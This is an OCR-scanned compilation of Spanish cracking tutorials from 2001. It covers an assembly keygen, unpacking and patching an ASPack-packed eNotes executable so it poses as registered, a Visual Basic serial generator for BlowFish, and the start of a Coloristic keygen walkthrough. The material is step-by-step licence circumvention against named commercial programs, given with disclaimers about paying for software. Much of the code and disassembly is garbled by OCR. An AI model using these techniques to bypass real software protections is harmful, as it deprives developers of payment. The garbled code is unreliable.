jmp bucle3 


Recuperamos la dirección de numero, la volvemos a guardar y multiplicamos los cuatro números por 60h (código de 
"W" =57, más 9) 


seguir2: pop ecx 
push ecx 

bucle!4: mov al, byte ptr [ebx] 
.1f al== 


jmp seguir3 
.endif 


add al, 9 
xor esi, esi 
buclela: mov dl, byte ptr [ecx+esi] 
xor dl, al 
mov byte ptr [ecx+esil, dl 
inc esi 
.1f esi < 4 
jmp buclela 
.endif 
inc ebx 
jmp bucle4 


Ahora hemos "xoreado" los cuatro números con cada uno de los códigos de las letras de nuestro nombre. 


seguir3: pop ecx 
mov edi, dword ptr [ecx] 
cmp edi, O 
jge saltol 
neg edi 
cmp edi, O 
saltol: jnz menor 
mov edi, 1 


Si el número es negativo lo vuelve positivo, y si es cero lo iguala a uno. Ahora tenemos nuestro serial en EDI. 


menor: .1f edi < 270Fh 
mov eax, 10 
xor edx, edx; 
imul edi 
mov edi, eax 
mov dword ptr [ecx], edi 
jmp menor 
.endif 


Si el número es menor que 9999 (270Fh), lo multiplicamos por 10. (tendría que ser menor o igual) 


mayor: .1f edi > 0F423Fh 
push ecx 
mov ecx, 10 
xor edx, edx 
mov eax, edi 
idiv ecx 
pop ecx 
mov edi, eax 
jmp mayor 

.endif 


Si el número es mayor de 999999 (F423Fh), lo dividimos por 10. 


mov esi, offset serial 
mov byte ptr [esil, 49h 
inc esi 

mov byte ptr [esil, 57h 
inc esi 

mov byte ptr [esil, 2Dh 


Ahora en el campo serial, hemos puesto los códigos ASCII de "IW-". Vamos a pasar el número hexadecimal 
obtenido, a decimal. Esto se hace dividiendo el número hexadecimal por 10 y poniendo el resto de la división en el 
lugar de las unidades, luego se divide el cociente por 10 y el resto se pone en el lugar de las decenas y se continua así 
hasta que el cociente es menor de 10 y se coloca como cifra más significativa del serial. 

Si el número obtenido es igual a 9999, le sumaremos 4 a ESI para que apunte a las unidades; si es menor de 100000 
(186A0h) le sumaremos 5, y si es igual o mayor le sumaremos 6. 


«if edi == 270Fh 


add esi, 4 
jmp seguir4 
.endif 
.1¡f edi < 186A0h 
add esi, 5 
.else 
add esi, 6 
.endif 


seguir4: mov eax, edi 
mov ecx, 10 
otro: cmp eaX, ecx 
jb fin 
xor edx, edx 
idiv ecx 
add dl, 30h 
mov byte ptr [esil, dl 
dec esi 
jmp otro 
fins add al, 30h 
mov byte ptr [esil, al 


Ya tenemos el serial del tipo IW-nnnnm, yo no he conseguido ningún número de cuatro o cinco cifras, pero por lo 
visto, la posibilidad existe. Ahora, recuperaremos los registros y regresamos. 


popad 
ret 
Operacion endp 


end start 


Misión cumplida :-) He aquí el resultado. 


Nombre] — CaoSReptante 
serial IES 
Terminar | 


Os recuerdo una vez más que debéis pagar los programas que utilicéis regularmente y que estos tutos deben servir 
solamente para aprender. Luego no le digáis al juez: "Yo no quería, pero CaoS ReptantE me incitó a delinquir..." ;-) 


Por último quiero saludar a mis buenos amigos Act MagO y PrfESOr X. También a Karpoff, Silver Storm, 
KuaTo_ThoR, vLuGo, ByTESCRK y last but not least: DeK_OIiN. 


Si queréis alguna aclaración sobre mis tutos, mi dirección de e-mail es: caos_reptante O hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2001 


Programa: eNotes 1.10 Build 1.1.6.160 


PROTECCION: Serial distinto en cada instalación. 

Objetivo: Simular estar registrados. 

Descripcion: Permite escribir notas y pegarlas en el escritorio. 

Dificultad: Aficionado. 

DOWNLOAD: http://wwwW.simtel.net/pub/simtelnet/win95/desktop/enotes11.zip 

Herramientas: Softice, W32dasm, file insPEctor, ProcDump, UltraEdit. 

CRACKER: CaoS ReptantE FECHA: 10/09/2001 
INTRODUCCION 


La verdad, cuando empecé a trabajar este programa lo hice pensando en otro tema del que quizá algún día 
hablaremos, y no tenía intención de escribir un tuto sobre él, pero según lo iba viendo, me daba cuenta de 
que era un perfecto cobaya, porque tiene una serie de características que hacen que su estudio resulte 


instructiv 
esfuerzos 


O. La verdad es que resulta dudoso que la utilidad del programa por sí sola, justifique los 
que vamos a realizar, pero lo cierto es que estamos en esto para aprender, no para disfrutar de 


programas de calidad dudosa sin pagar un céntimo ;-) 


AL ATAKE 


Empezamos -como siempre- con el Softlce cargado y ejecutamos el programa, que se va de cabeza a la barra de 


tareas. Vamos allí y le damos al botón derecho del ratón y vamos a Help/Register. Allí aparece una ventana en la que 
nos piden nada menos que 25 $ por registrarnos y aparece también un código llamado Serial ID y debajo el recuadro 
para introducir nuestro serial. Este Serial ID podemos comprobar que varía en cada instalación, con lo cual también 
variará el serial que deberíamos introducir para registrarnos. No nos preocupemos por eso de momento. Introducimos 
nuestro serial chungo, ctrl+D para entrar en el Slce, introducimos nuestro breakpoint favorito: bpx hmemcpy, F5 
para salir de Slce y OK para registrarnos. Salta el Slce, le damos varias veces a F12 hasta que regresamos al 
programa en: 


:0042C63A 5] 


El 


pop esi 


Ahora se trata de buscar mediante la instrucción s 30:00 1 ff£fffff 'serial_chungo' la posición o posiciones que ocupa 
en la memoria el número introducido. A continuación, empleando las instrucciones bpm dirección _obtenida r o 
bpr inicio_dirección obtenida final_dirección obtenida r sabremos cuando el programa lee este número para 


compararlo con el correcto. Una vez hecho esto, le damos a F5 y nos detenemos en varios lugares que no nos llaman 
la atención, pero de pronto... 


:00403F31 8BOE mov ecx, dword ptr [esi] 
:00403F33 8B1F mov ebx, dword ptr [edi] 
:00403F35 39D9 cmp ecx, ebx 
:00403F37 7558 jne 00403F91 


¡BIEN! ¡Lo tenemos! En EST tenemos la dirección de nuestro serial chungo y en EDI la del serial verdadero. Así 
pues, ya podemos registrarnos. Pero... un momento, ¿no habíamos quedado en que el serial sería distinto a cada 
instalación? Así, este serial sólo nos sirve a nosotros. ¡No pasa nada! parchearemos el salto. Pero... ¡ay! que poco 
dura la alegría en la casa del pobre :-( Como ya he dicho, estaba yo investigando otra cosa y en vez de parchear el 
salto, puse un bpx en 403F31, y me lleve la desagradable sorpresa de ver que el programa se detenía varias veces en 
este punto comparando cadenas de texto que unas veces eran iguales y otras no. Así que hay que olvidarse de 
parchear el salto. Está claro que después de esta comparación debe haber otra que nos lleve al éxito o al fracaso. Pero 
esto debemos verlo en el listado muerto del W32dsam. Antes, vamos a ver que nos dice el file insPEctor...¡ Arghhh! 
empaquetado con Aspack v1.08.04. Bueeeeeeno, vamos a desempacarlo. Ejecutamos el Symbol Loader para tracear 
con el Slce desde el inicio del programa, cargamos el módulo del programa, le damos a las ruedecitas, le decimos 
que sí al mensaje de error y... nos encontramos que el programa, sin detenerse para nada, se ha ido a la barra de 
tareas. Que no cunda el pánico, cerramos el programa, vamos al ProcDump y en PE Editor seleccionamos nuestro 
programa, después en Sections, nos ponemos sobre la primera (CODE) y le damos al botón derecho del ratón, 
escogemos Edit Section y vemos que en Section characteristics tenemos el valor CODO0040, que cambiamos por 
E0000020. OK y a la calle. 


No tengo muchas ganas de explicar la razón de esto y citaré a nuMIT_or (Descabezando archivos ejecutables 
portables): 


El campo Characteristics indica las propiedades de la sección, es decir, si se trata de código objeto, de datos 
inicializados o no inicializados, si se puede escribir y leer sobre la sección, si es ejecutable, si es compartible, etc. 
PROCDUMP llama a este campo "CHARACTERISTICS". A continuación las equivalencias: 


000000020h _ Código. 

000000040h __ Datos inicializados. 

000000080h __Datos no inicializados. 

040000000h __ Sección cacheable. 

080000000h __Sección paginable. 

100000000h __Sección compartida. 

200000000h _ Ejecutable. 

400000000h __Se puede leer. 

800000000h __Se puede escribir en la sección. 
Esto quiere decir que teníamos una sección en la que se podía leer y escribir y tenía datos inicializados. Ahora 
tenemos una sección en la que además de poderse leer y escribir, es ejecutable y contiene código. Repetimos el 
intento de tracear el programa desde el inicio y ahora sí, el Slce se detiene en: 


:004D4001 60 pushad 
:004D4002 E870050000 call 004D4577 


A partir de aquí se trata de tracear con F10 y sobre todo con mucha paciencia. Nos encontraremos con un montón de 
bucles con una estructura similar a esta: 


Inicio del bucle. 
Instrucciones 


Salto condicional a siguiente. 
Más instrucciones 


Salto incondicional al inicio del bucle. 


siguiente. 


El salto al inicio del bucle se reconoce fácilmente porque es un salto hacia atrás. Para ahorrar tiempo y energías, es 
recomendable ir directamente a la instrucción siguiente mediante un doble click con el ratón o con bpx siguiente o g 
siguiente. 

Finalmente, nuestros esfuerzos se ven recompensados y llegamos al final del proceso: 


:004D44F1 61 popad 

:004D44F2 7508 jne 004D44FC 
:004D44F4 B801000000 mov eax, 00000001 
:004D44F9 C20C00 ret 000€ 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004D44F2 (C) 

:004D44FC 6848AE4900 push 0049AE48 
:004D4501 C3 ret 


¿Y ahora que hacemos? Cuando estemos situados sobre la instrucción PUSH 0049AE48, introducimos la instrucción 
a eip y seguidamente, tras la dirección de la instrucción, jmp eip. Otra vez RETURN para dejar el ensamblado 
(veréis que el código 6848AE4900 (PUSH 0049AE48) ha sido substituido por EBFE (JMP 4D44FC)) y F5 para que el 
programa se siga ejecutando. Al seguir ejecutándose, lo que hace es entrar en un bucle infinito, lo cual 
aprovecharemos para ejecutar el ProcDump, buscar en Task el programa que hemos dejado ejecutándose, y tras 
clickear encima con el botón derecho del ratón, elegiremos la opción Dump (Full). Le damos el nombre que nos 
parezca para diferenciarlo del empacado (por ejemplo eDump.exe) y repetimos este último proceso, pero eligiendo la 
opción Kill task para terminar la ejecución del programa y del interminable bucle. 

Ahora tenemos un ejecutable desempaquetado, lo ejecutamos y: "Este programa ha efectuado una operación no 
admitida y...” ¿Y ahora que pasa? Que tendremos que dejar como estaba la instrucción que hemos modificado. 
Vamos a echar mano de un editor hexadecimal y buscaremos "EBFEAE4900" que es lo que ha quedado al 
superponer a la instrucción PUSH que teníamos, la instrucción JMP. Lo encontramos sin problemas y substituimos 
"EBFE" por "6848" con lo que volvemos a tener la instrucción original. Volvemos a ejecutar eDump.exe y 
FUNCIONA :-) 

Ahora por fin, podemos desensamblar el programa con el W32Dsam y lo primero que haremos es buscar entre las 
String Data References alguna referencia a password incorrecto o algo parecido. Encontramos lo que buscábamos y 
ello nos conduce a esta parte del programa: 


:0048D415 EBSEEGAF7FE call 00403F08 

:0048D41A 7527 jne 0048D443 

:0048D41C A160C64900 mov eax, dword ptr [0049C660] 
:0048D421 8B00 mov eax, dword ptr [eax] 
:0048D423 8B4030 mov eax, dword ptr [eax+30] 
:0048D426 8B55EC mov edx, dword ptr [ebp-04] 
:0048D429 EB8BAD6FEFE call 0047AAE8 

:0048D42E 668B0D84D44800 MOV CX, word ptr [0048D484] 
:0048D435 B202 mov dl, 02 


* Possible StringData Ref from Code Obj ->"Thank you for registering eNotes!" 


:0048D437 B890D44800 mov eax, 0048D490 
:0048D43C E833F1FFEF call 0048C574 
:0048D441 EB13 jmp 0048D456 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0048D41A(C) 
:0048D443 668B0D84D44800 MOV CX, word ptr [0048D484] 
:0048D44A B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"Registration password is invalid!" 


:0048D44C B8BCD44800 mov eax, 0048D4BC 
:0048D451 ES1EF1FFEFE call 0048C574 


Si miramos esto con una mínima atención, veremos que la diferencia entre "chico bueno" y "chico malo" está en: 


0048D41A 7527 jne 0048D443 ¿Qué os parece si hacemos que nunca salte? para ello podemos substituir 7527 
por 9090 o si somos perfeccionistas, por 7500. Pues venga, tomamos nota del offset correspondiente a 48D41A, que 
es 8CALA y volvemos al editor. Ya estamos de vuelta. Naturalmente hemos elegido la opción de substituir 27 por 
00. Y ahora ejecutamos el programa de nuevo. Introducimos nuestros datos, aparentemente los acepta. Reiniciamos 
el programa y... ESTAMOS REGISTRADOS. Pues ya está ya hemos terminado. Pero un momento, supongamos que 
queremos pasarle el parche a un colega para que pueda evaluar el programa con toda tranquilidad ;-) ¿Le vamos a dar 
un ejecutable de 800 KB? A estas alturas, debemos ser capaces de algo mejor. Vamos a ver que podemos hacer... 


Lo ideal sería parchear el ejecutable empaquetado para que cuando se efectúa el salto desde la rutina de desempacado 
al programa propiamente dicho, no fuera a la dirección de inicio del programa sino a un trocito de código y de allí al 
inicio del programa. Vamos a desensamblar el programa empacado. Lo desensamblamos con el W32Dsam pero el 
código desensamblado sólo llega a la posición 43B9FF. Por lo tanto, no aparecen las instrucciones que buscamos, 
que están a partir de 4D44F1. Hummm... eso debe estar en la sección .aspack. Vamos a probar de cambiar sus 
características igual que hicimos con la sección CODE. Lo hacemos, y de nuevo en el desensamblador tenemos a la 
vista el código que necesitamos: 


:004D44F1 61 popad 

:004D44F2 7508 jne 004D44FC 
:004D44F4 B801000000 mov eax, 00000001 
:004D44F9 C20C00 ret 000€ 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004D44F2 (C) 

:004D44FC 6800000000 push 00000000 
:004D4501 C3 ret 


Bueno, esto es casi igual que antes, pero algo falla: el parámetro de la instrucción PUSH que antes era la dirección de 
inicio del programa desempacado, ahora es O. Por si alguien se ha perdido, os recuerdo que lo que hemos visto antes 
era esta zona justo cuando había terminado el desempacado del programa y lo que vemos ahora es el listado muerto o 
desensamblado del programa antes de ejecutarse. Lo que está claro, es que en algún momento del desempacado, se 
ponen en la dirección 4D44FD los cuatro bytes que definen la dirección del inicio del programa y que son los que 
queremos cambiar para dirigirnos al lugar donde pondremos nuestro código. Volvemos al Symbol Loader y 
ejecutamos de nuevo el programa empaquetado. Cuando el Slce se detiene al principio de la ejecución, introducimos: 
bpm 4d44fd y le damos a F5. Se detiene el Softlce y vemos que los cuatro bytes que buscamos se ponen en la 
instrucción anterior al POPAD y que proceden de EAX. 


:004D44DB 8B856A3A4400 mov eax, dword ptr [ebp+00443A6A] 
:004D44E1 50 push eax 

:004D44E2 0385F8474400 add eax, dword ptr [ebp+004447F8] 
:004D44E8 59 pop ecx 

:004D44E9 OBC9 Or ecx, ecx 

:004D44EB 8985953E4400 mov dword ptr [ebp+00443E95], eax 


Si miramos las instrucciones anteriores, veremos que hay que poner un bpx 4d44db y volver a empezar para ver 
donde podemos meter la zarpa :-) Se detiene de nuevo el SlIce, podemos ver en la parte superior izquierda, que la 
dirección EBP + 443A6A corresponde a 4D40D2 y que el valor que hay en ella es 48AE09, por lo que en EAX se 
coloca el valor 0O009A FAS a lo que se suma 00400000. Podemos comprobar que el valor 48AE009 está en esta 
dirección mirando el listado muerto del programa empaquetado W32dsam: 


:004D40D1 0048AE add byte ptr [eax-52], cl 
:004D40D4 0900 or dword ptr [eax], eax 


Fijaos como el pobrecillo ha tratado de desensamblarlo como parte del código. 
Por ahora ya sabemos que podemos cambiar la dirección del salto hacia nuestro código, ahora vamos a buscar un 
lugar para éste. Un poco más abajo de este punto, encontramos lo siguiente: 


:004D41B2 00000000000000000000 BYTE 10 DUP (0) 
:004D41BC 00000000000000000000 BYTE 10 DUP (0) 


Parece que este lugar es ideal para nosotros. Una manera de confirmarlo es escribir algo de texto en él, ejecutar el 
programa y durante la ejecución, mirar si el texto existe y está entero. En nuestro caso no hay problema. Si hubiera 
problemas, lo mejor es usar los ceros que hay siempre en el final de alguna sección. Así pues está decidido que 
nuestro código va a ir en la dirección 4D41B2. Entonces ¿qué vamos a poner en la posición 4D40D2 en lugar de 
48AE09? Debemos poner B2410D. Buscamos en el editor hexa la cadena "0048AE0900" que tenemos arriba y una 
vez hallada, substituimos 48AE09 por B2410D. ¿Funcionará? 

Vamos a comprobarlo. Una vez más, ejecutamos el programa desde el Symbol Loader y ponemos un bpx 4d44db. 
Se detiene el Slce y BINGO se coloca la dirección correcta, traceamos con F10 y ahora que va a saltar a la zona de 
ceros es el momento de ensamblar nuestro código. Al llegar a la dirección 4D41B2, tecleamos a eip y a continuación 
vamos introduciendo instrucciones: push eax / xor eax, eax / mov byte ptr [48d41b], al / jmp 49ae48 / pop eax y 
finalmente ret. Ahora debemos tomar nota de los códigos generados para introducirlos posteriormente con el editor. 
Estos códigos son: 


50 33 CO A2 1B D4 48 00 58 E9 88 €C FC FF C3 


Los introduciremos en el programa empacado mediante el editor hexadecimal, en el offset correspondiente a la 
dirección 4D41B2 que podemos calcular o ver en el W32dsam. El resultado es: 449B2. Una vez entrados los datos 
en el programa, nuestro código queda así: 


:004D41B2 50 push eax 

:004D41B3 33C0 xor eax, eax 

:004D41B5 A21BD44800 mov byte ptr [0048D41B], al 
:004D41BA 58 pop eax 

:004D41BB E9886CFCFF jmp 0049AE48 

:004D41C0 C3 ret 


Con esto, me parece que queda explicado el procedimiento que hemos seguido para parchear el programa empacado 
de modo que al desempacarse quedara parcheado y operativo. Si alguna cosa no ha quedado clara, podéis darme un 
toque. Así terminamos con un programa que en cualquier caso, tiene una característica que lo hace distinto de 
cualquier otro programa que yo haya visto: que teniendo la clásica estructura de: serial chungo en un registro / serial 
bueno en otro / comparación entre ambos / salto condicional, no hay que parchear el salto para registrar el programa. 


Antes de despedirme quiero recordaros como siempre que debéis pagar los programas que utilicéis regularmente. No 
hagáis que me avergiience de vosotros ;-) 


Finalmente quiero saludar a mis amigos Act MagO, PrfEsOr X y ByTESCRK. También a Karpoff, Silver Storm, 
KuaTo_ThoR, y DeK_OIiN. 


Si queréis alguna aclaración sobre mis tutos, mi dirección de e-mail es: caos_reptante O hotmail.com 
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INTRODUCCION 


II 


Pues en este tutorial, lo que veremos será ver como se genera nuestro serial, realmente será ver la parte del 
código que nos interesa, de este mismo autor hay un total de 17 aplicaciones cada una genera un serial para 


nuestro nombre distinto todo ello proviniendo de nuestro nombre y empresa con que nos registremos, los 


precios de cada uno oscilan entre los $25.00, yo en lo personal no utilizo ninguno, mas que de vez en 
cuando, la pura verdad, la protección de estos programas es bastante vaga. Haciendo memoria en mi primer 
tutorial definía la manera de encontrar un serial válido para nuestro nombre, en ese tiempo aún no 
comprendía muy bien como funcionan las cosas en este ambiente, aunque no he avanzado mucho, aqui les 
entrego esta nueva producción. 


AL ATAKE 


Antes que nada debo decirles, que, nuestro serial se forma por dos cadenas de texto, es decir, nuestro nombre y la 
empresa, pero tambien debemos tomar en cuenta otras dos cadenas de caracteres como palabras clave. 


Es decir tendremos esto: 


Strgl = CadenaClavel 

Strg2 = CadenaClave2 
Nombre = NuestroNombre 
Empresa = CualquierCosa 
Serial = NuestroSeriallnválido 


Una vez hayamos descargado nuestro programa (en mi caso he seleccionado el nuevo BlowFish v2.2), instalo el 
nuevo programa y me voy a Help > Register... he ingreso mis datos 


Nombre = ByTESCRK 
Empresa = Registered 
Serial = 123456 


Salta un hermoso mensaje que dice: 


An invalid software registration number was detected. 


Iniciamos primeramente el W32DASM y desensamblamos el programa BlowFish.exe, cuando este ya ha 
desensamblado, buscamos en las Strings Reference de W32DASM y vemos que no hay ninguna cadena que nos 
identifique el mensaje de error, tomando en cuenta el primer tutorial sabemos que esta es un GetDlgltemTextA, 
entonces cerramos el programa y cargamos nuestro TRW2000, buscamos el programa y hacemos clic en Load, 
cuando salta el TRW2000 presionamos Ctrl+N y esperamos a que cargue el programa, luego, ingresamos nuestros 
datos nuevamente, antes de hacer clic en OK, presionamos Ctrl+N y volvemos a TRW2000, ponemos un punto de 
ruptura en GetDlgltemTextA y volvemos al programa con Ctrl+N, hacemos clic en OK y salta el TRW2000, vemos 
que caemos en una llamada a Kernel presionamos F12 hasta que quedemos en BlowFish 


* Referenced by a CALL at Addresses: 
1:00408A12 , :00408A20, :00408A32 


* Reference To: USER32.GetDlgltemTextA, Ord:0104h 


:0041069B FF1500924100 Call dword ptr [00419200] 


:004106A1 SF pop edi 

:004106A2 SE pop esi 

:004106A3 B801000000 mov eax, 00000001 

:004106A8 5B pop ebx 

:004106A9 C3 ret  <-- Caemos aqui y volvemos a 00408A12 


Primero, quitamos el punto de ruptura con la instrucción BC * al ir traceando vamos a llegar hasta aqui, 


:00408A42 8BD8 mov ebx, eax 

:00408A444 EsB77B0000 call 00410600 <-- Vamos a investigar aqui, entramos con F8 
:00408A49 83C438 add esp, 00000038 

:00408A4C 3D92A71901  cmp eax, 01194792 

:00408A51 7518 ¡ne 00408A6B 


En mi caso para entrar en la llamada voy a cargar el OllyDebugger "un muy buen programa en ambiente gráfico" y 
voy a cargar el programa blowfish.exe en el. Ya cargado y con el código listo para ser roto, presiono F9 para que el 
programa cargue y voy a ingresar mis datos, antes de hacer clic en OK, selecciono el Olly, presiono Ctrl+G y voy a 
00410600, pongo un punto de ruptura presionando la tecla F2 una vez y listo, y cuando hago clic en OK se pausa el 
programa y me devuelve al BPX que coloqué, presiono F9 nuevamente y me da el error de serial no válido, presiono 
OK y hago clic en OK nuevamente, selecciono el Olly y voy traceando en el con F7 y voy viendo lo siguiente: 


:00410600 51 push ecx 

:00410601 53 push ebx 

:00410602 8B5C240C mov ebx, dword ptr [esp+0C]  <-- EBX recibe mi nombre 
:00410624 BE70ED4100 mov esi, 0041ED70  <-- Aqui aparece una cadena clave 
:00410629 BFO1000000 mov edi, 00000001 

:0041062E 2BF3 sub esi, ebx 

:00410630 8BCB mov ecx, ebx 


:00410632 2BFB sub edi, ebx 


En la siguiente instrucción extraemos caracter por caracter de la primer palabra clave y tomamos su valor 
Hexadecimal, este es almacenado en EBX 


:00410634 OFBE1COE  movsx ebx, byte ptr [esi+ecx] 


Lo mismo que el anterior sin embargo, es sobre la segunda palabra clave, EAX=8 que representa la longitud de 
caracteres de nuestro nombre; EDX va aumentando uno de acuerdo a cada vez que se realiza el ciclo y 0041ED38 
alberga nuestra segunda cadena clave 


:00410638 OFBEAC1038ED4100  movsx ebp, byte ptr [eax+edx+0041ED38] 


:00410640 OFAFDD imul ebx, ebp  <-- Multiplica ebx por ebp en hexa 

:00410643 8D2C0F lea ebp, dword ptr [edi+ecx]  <-- Suma 1 en cada ciclo 
:00410646 OFAFDD imul ebx, ebp  <-- Multiplica nuevamente los valores 
:00410649 OFBE29 movsx ebp, byte ptr [ecx] <-- Extrae un caracter del nombre 
:0041064C OFAFDD imul ebx, ebp  <-- Multiplica nuevamente los valores 
:0041064F 8B6C2410 mov ebp, dword ptr [esp+10]  <-- Recupera el acumulado 
:00410653 03EB add ebp, ebx  <-- Suma el valor actual y el acumulado 
:00410655 42 inc edx  <-- Incrementa EDX en 1 

:00410656 41 incecx  <-- Incremente ECX en 1 

:00410657 3BDO cmp edx, eax  <-- Compara EDX > EAX 

:00410659 896C2410 mov dword ptr [esp+10], ebp  <-- Guarda el acumulado 
:0041065D 7CD5 31 00410634<-- Si EDX es menor que EAX vuelve a 00410634 


Al salir EAX tendrá nuestro serial en HEXA si y solo si ya se ha realizado el proceso anterior con nuestro nombre de 
la empresa en mi caso "Registered". 


:0041065F 8BC5 mov eax, ebp 
:00410661 SF pop edi 
:00410662 5D pop ebp 
:00410663 5E pop esi 
:00410664 5B pop ebx 
:00410665 59 pop ecx 
:00410666 C3 ret 


Ya que tenemos el valor en hexa vamos a seguir traceando ahora con F8 puesto que aqui unicamente se generó el 
nombre y no se uso la empresa, veamos que nos depara el código, justo lo que me temía, caemos en una nueva 
instrucción de llamada vean esto... 


:00408A74 E8B7750000 call 00410030 


Vamos a entrar aqui con F7, nos aparece esto, 


:00410030 8B442404 mov eax, dword ptr [esp+04] <--Recibe nuestro nombre 
:00410034 56 push esi 

:00410035 8B3574A04200 mov esi, dword ptr [00424074] 

:0041003B SOnbsp; push eax 


:0041003C 81CE78030000 - or esi, 00000378  <-- EST igual un valor constante 
:00410042 E8B9050000 call 00410600<-- Genera un valor Hexa de nuestro Nombre (devuelve EAX) 


:00410047 8B4C2410 mov ecx, dword ptr [esp+10]  <-- Nuestra empresa 

:0041004B 03F0 add esi,eax  <--ESI=ESI+EAX 

:0041004D 51 push ecx 

:0041004E E8ADO050000 call 00410600<- Genera un valor Hexa de nuestra empresa(devuelve EAX) 
:00410053 83C408 add esp, 00000008 

:00410056 03C6 add eax,esi <-- EAX obtiene el serial válido en hexa 

:00410058 5E pop esi 

:00410059 C3 ret 


Ahora ya hemos encontrado nuestro serial, hemos localizado la rutina de generación del serial correcto, para 


transformar el valor del serial válido en hexa debemos hacer uso de nuestra calculadora de windows, aqui les 
muestro ahora un resumen de la generación del serial válido o de la rutina en sí. 0JE QUE TODAVIA QUEDA 
ALGO LOS CAMPOS TIENEN UNA LONGITUD DE 49 CARACTERES ASI QUE A PENSAR... QUE PASARA 
SI SE LES TERMINA LA CADENA DE CARACTERES 


RUTINA ESCRITA EN VISUAL BASIC 


Public Function Genera(texto As String) 
strgl = ColoqueAquiLaCadenaUnoY Mayor 
strg2 = ColoqueAquiLaCadenaDos Y Menor 
long1 = Len(Trim(texto)) 
long2 = longl 
suma =0 
For i= 1 To longl 
extrae = Asc(Mid(strgl, long2, 1)) 
If extrae = 32 Then 


extrae = 0 
End If 
ret = extrae * Asc(Mid(strg?, 1, 1)) 
ret = ret *i 


ret = ret * Asc(Midítexto, i, 1)) 
long2 = long2 + 1 
suma = suma + ret 

Next 

Genera = suma 

End Function 


£2 Todos los de Software By Design ES 


Programa [Blowtish y] 
Nombre: [ByTESCRK 


Empresa: [Registered 
Serial: [338270767 


Software By Design 


Cómo siempre y como en cualquier tutorial, recuerden este es únicamente como diversión y con el único 
ánimo de aprender, no me hago responsable del mal uso que se le dé, recuerden que si les gusta el programa es 
mejor que lo ¡¡¡REGISTREN!!!. 


Saludos a Karpoff, PrOfesor_X, CaoS ReptantE (sigue no te rindas) y a todos los crackers hispanohablantes, en 
especial a ti por que has llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRK Giespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2001 


Programa: Coloristic v1.2 


PROTECCION: Serial 


PROPOSITO: Sacar serial y hacer un KeyGen 


Coloristic es una simple utilería la cual agranda el área de la 
Descripcion: pantalla en donde está el cursor y nos permite ver el color de un 
pixel específico en diferentes formatos. 


Dificultad: Novato. 


DOWNLOAD : Bubble Pop Software 
Herramientas: TRW2000, W32dasm 


CRACKER: ByTESCRK FECHA: 23/08/2001 


| INTRODUCCION 


Hace algún tiempo necesité saber cuales eran los colores de algunas gráficas, necesitaba estar viendo las 
páginas y el color que representaba, este programa me ayudó mucho. Bueno, ¿como han estado?, desde mi 
primer tutorial que ya no escribía otro, ahora después de haber solventado problema con el notepad, estoy de 
vuelta. Aqui les pego la descripción completa: 


"Coloristic is a simple utility which magnifies the area of the screen surrounding the cursor. It will also 


display the color value for the pixel that is exactly under the cursor and allow you to copy that color 
value to the clipboard. In addition, you can measure the distance between any two pixels on screen, and 
save the magnified image to a file or the clipboard." 


| AL ATAKE 


Lo primero es lo primero, abrimos el programa y vemos que nos aparece una caja de texto que nos recuerda que debemos de 
registrarnos, hacemos clic en Register... y nos aparece otra, ahora ingresemos un nombre y código cualquiera, yo ingresé este 
"ByTESCRK" y "1234", nos saldrá otra ventanita que nos dice que no tenemos un serial válido. Nuestro propósito es hacer un 
Keygen, cerramos el programa y nos vamos a desensamblarlo con el W32DASM, cuando ya lo tengamos, vamos a buscar la String 
Reference del mensaje de error que nos salió en la última ventanita, osease esta 

"You have entered an invalid registration code. Please contac...'' 


Hacemos doble clic sobre ella y caemos en este lugar... 


:00403C69 E8S32360000 call 004072A0 
:00403C6E EB2A jmp 00403C9A 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00403C26(C) Tenemos que investigar aquí 


* Possible Ref to Menu: MenulD_0064, Item: "Register..." 
| 


* Possible Reference to String Resource ID=00501: "You have entered an invalid registration code. Please contac" 


| 
:00403C70 68F5010000 push 000001F5  Caemos aqui 


:00403C75 8D45F8 lea eax, dword ptr [ebp-08] 
:00403C78 50 push eax 


Vamos a ir ahora al botón del W32DASM llamado Goto Code Location y nos vamos a ir a la referencia de arriba que sería la 
dirección 00403C26 (marcada en rojo), caemos en ella y empezamos a ver nuestros alrededores y vemos que es un salto condicional 
je, veamos el código y analicémoslo... 


:00403C13 50 push eax 

:00403C14 8B4D9C mov ecx, dword ptr [ebp-64] 

:00403C17 ESE41C0000 call 00405900 Esta es la Call que genera el serial correcto 
:00403C1C 8B439C mov eax, dword ptr [ebp-64] El valor 0 ó 1 lo guarda en EAX 
:00403C1F 83B8D800000000  cmp dword ptr [eax+000000D8], 00000000 Compara EAX no igual a 0 
:00403C26 7448 je 00403C70 Si EAX igual 0 entonces ir a 00403C70 


* Possible Ref to Menu: MenulD_0064, Item: "About Coloristic" 


* Possible Reference to String Resource ID=00500: "Thank you for registering your copy of Coloristic ..." 


:00403C28 68F4010000 push 000001F4 
:00403C2D 8D45F0 lea eax, dword ptr [ebp-10] 
:00403C30 50 push eax 


Hagamos clic en el botón CALL de la barra de herramientas de W32DASM y caemos en este punto, vemos que la direción es 
00405900, cargamos el TRW2000 y buscamos el programa coloristic.exe haciendo clic en browse, hacemos clic en load y nos 
aparece el punto de entrada del programa, ctrl+n y cerramos la ventana, vamos a Help > Register... e ingresamos nuestros datos en mi 
caso ya los dije, ponemos un punto de ruptura (Breakpoint) en 405900, volvemos al programa y al hacer clic en Register, salta el 
TRW2000, y 


:00405900 55 pushebp  Caemos aqui 

:00405901 89E5 mov ebp, esp 

:00405903 53 push ebx 

:00405904 56 push esi 

:00405905 81EC30010000 sub esp, 00000130 

:0040590B 898DC8FEFFFF mov dword ptr [ebp+FFFEFFEC8], ecx 

:00405911 8B4508 mov eax, dword ptr [ebp+08] 

:00405914 8B5004 mov edx, dword ptr [eax+04]  EDX recibe el valor de la longitud del nombre 
:00405917 8995CCFEFFFF mov dword ptr [ebp+FFFFFECC], edx 

